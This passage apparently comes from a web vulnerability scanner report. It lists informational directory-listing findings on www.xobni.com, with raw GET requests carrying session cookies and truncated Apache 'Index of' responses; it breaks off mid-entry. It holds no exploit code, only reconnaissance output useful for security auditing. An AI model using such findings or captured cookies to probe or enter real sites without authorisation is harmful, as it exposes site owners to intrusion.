Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:27 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 866
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/structure/skype</title>
</head>
<body>
<h1>Index of /images/structure/skype</h1>
<table><tr><th><img
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/structure/">Parent Directory</a>
...[SNIP]...

13.46. http://www.xobni.com/images/structure/videoinline/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/structure/videoinline/

Request

GET /images/structure/videoinline/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/structure/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:28 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 2670
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/structure/videoinline</title>
</head>
<body>
<h1>Index of /images/structure/videoinline</h1>
<table><
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/structure/">Parent Directory</a>
...[SNIP]...

13.47. http://www.xobni.com/images/team/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/team/

Request

GET /images/team/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:38 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 4308
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/team</title>
</head>
<body>
<h1>Index of /images/team</h1>
<table><tr><th><img src="/icons/blank.gif"
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.48. http://www.xobni.com/images/welcome_screen/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/welcome_screen/

Request

GET /images/welcome_screen/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:38 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 840
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/welcome_screen</title>
</head>
<body>
<h1>Index of /images/welcome_screen</h1>
<table><tr><th><img sr
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.49. http://www.xobni.com/javascripts/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/javascripts/

Request

GET /javascripts/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:10:12 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 3631
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /javascripts</title>
</head>
<body>
<h1>Index of /javascripts</h1>
<table><tr><th><img src="/icons/blank.gif"
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/">Parent Directory</a>
...[SNIP]...

13.50. http://www.xobni.com/javascripts/swfobject/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/javascripts/swfobject/

Request

GET /javascripts/swfobject/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:10:07 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 837
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /javascripts/swfobject</title>
</head>
<body>
<h1>Index of /javascripts/swfobject</h1>
<table><tr><th><img sr
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/javascripts/">Parent Directory</a>
...[SNIP]...

13.51. http://www.xobni.com/javascripts/swfobject/2.2/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/javascripts/swfobject/2.2/

Request

GET /javascripts/swfobject/2.2/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:10:08 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1075
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /javascripts/swfobject/2.2</title>
</head>
<body>
<h1>Index of /javascripts/swfobject/2.2</h1>
<table><tr><th
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/javascripts/swfobject/">Parent Directory</a>
...[SNIP]...

13.52. http://www.xobni.com/media/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/media/

Request

GET /media/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:41 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 6145
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /media</title>
</head>
<body>
<h1>Index of /media</h1>
<table><tr><th><img src="/icons/blank.gif" alt="[ICO]"
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/">Parent Directory</a>
...[SNIP]...

13.53. http://www.xobni.com/media/contextual_gadgets/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/media/contextual_gadgets/

Request

GET /media/contextual_gadgets/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:41 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 845
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /media/contextual_gadgets</title>
</head>
<body>
<h1>Index of /media/contextual_gadgets</h1>
<table><tr><th><
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/media/">Parent Directory</a>
...[SNIP]...

13.54. http://www.xobni.com/media/contextual_gadgets/hoovers/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/media/contextual_gadgets/hoovers/

Request

GET /media/contextual_gadgets/hoovers/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:41 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1465
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /media/contextual_gadgets/hoovers</title>
</head>
<body>
<h1>Index of /media/contextual_gadgets/hoovers</h1>

...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/media/contextual_gadgets/">Parent Directory</a>
...[SNIP]...

13.55. http://www.xobni.com/media/contextual_gadgets/hoovers/images/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/media/contextual_gadgets/hoovers/images/

Request

GET /media/contextual_gadgets/hoovers/images/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:41 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 2630
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /media/contextual_gadgets/hoovers/images</title>
</head>
<body>
<h1>Index of /media/contextual_gadgets/hoover
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/media/contextual_gadgets/hoovers/">Parent Directory</a>
...[SNIP]...

13.56. http://www.xobni.com/media/enterprise/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/media/enterprise/

Request

GET /media/enterprise/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:40 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1073
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /media/enterprise</title>
</head>
<body>
<h1>Index of /media/enterprise</h1>
<table><tr><th><img src="/icons/
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/media/">Parent Directory</a>
...[SNIP]...

13.57. http://www.xobni.com/media/gadgets/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/media/gadgets/

Request

GET /media/gadgets/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/media/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:42 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 813
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /media/gadgets</title>
</head>
<body>
<h1>Index of /media/gadgets</h1>
<table><tr><th><img src="/icons/blank.
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/media/">Parent Directory</a>
...[SNIP]...

13.58. http://www.xobni.com/media/invites/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/media/invites/

Request

GET /media/invites/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/media/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:43 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1515
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /media/invites</title>
</head>
<body>
<h1>Index of /media/invites</h1>
<table><tr><th><img src="/icons/blank.
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/media/">Parent Directory</a>
...[SNIP]...

13.59. http://www.xobni.com/media/labs/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/media/labs/

Request

GET /media/labs/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/media/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:43 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 815
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /media/labs</title>
</head>
<body>
<h1>Index of /media/labs</h1>
<table><tr><th><img src="/icons/blank.gif" a
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/media/">Parent Directory</a>
...[SNIP]...

13.60. http://www.xobni.com/media/mobile/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/media/mobile/

Request

GET /media/mobile/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:40 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1927
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /media/mobile</title>
</head>
<body>
<h1>Index of /media/mobile</h1>
<table><tr><th><img src="/icons/blank.gi
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/media/">Parent Directory</a>
...[SNIP]...

13.61. http://www.xobni.com/media/plus/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/media/plus/

Request

GET /media/plus/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:41 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 2119
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /media/plus</title>
</head>
<body>
<h1>Index of /media/plus</h1>
<table><tr><th><img src="/icons/blank.gif" a
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/media/">Parent Directory</a>
...[SNIP]...

13.62. http://www.xobni.com/media/press/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/media/press/

Request

GET /media/press/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/media/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:43 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 843
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /media/press</title>
</head>
<body>
<h1>Index of /media/press</h1>
<table><tr><th><img src="/icons/blank.gif"
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/media/">Parent Directory</a>
...[SNIP]...

13.63. http://www.xobni.com/media/tutorials/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/media/tutorials/

Request

GET /media/tutorials/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/media/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:43 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 2487
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /media/tutorials</title>
</head>
<body>
<h1>Index of /media/tutorials</h1>
<table><tr><th><img src="/icons/bl
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/media/">Parent Directory</a>
...[SNIP]...

13.64. http://www.xobni.com/media/walkthroughs/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/media/walkthroughs/

Request

GET /media/walkthroughs/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:39 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 853
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /media/walkthroughs</title>
</head>
<body>
<h1>Index of /media/walkthroughs</h1>
<table><tr><th><img src="/ic
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/media/">Parent Directory</a>
...[SNIP]...

13.65. http://www.xobni.com/media/welcome_screen/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/media/welcome_screen/

Request

GET /media/welcome_screen/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/media/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:44 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1067
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /media/welcome_screen</title>
</head>
<body>
<h1>Index of /media/welcome_screen</h1>
<table><tr><th><img src=
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/media/">Parent Directory</a>
...[SNIP]...

13.66. http://www.xobni.com/media/widgets/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/media/widgets/

Request

GET /media/widgets/ HTTP/1.1
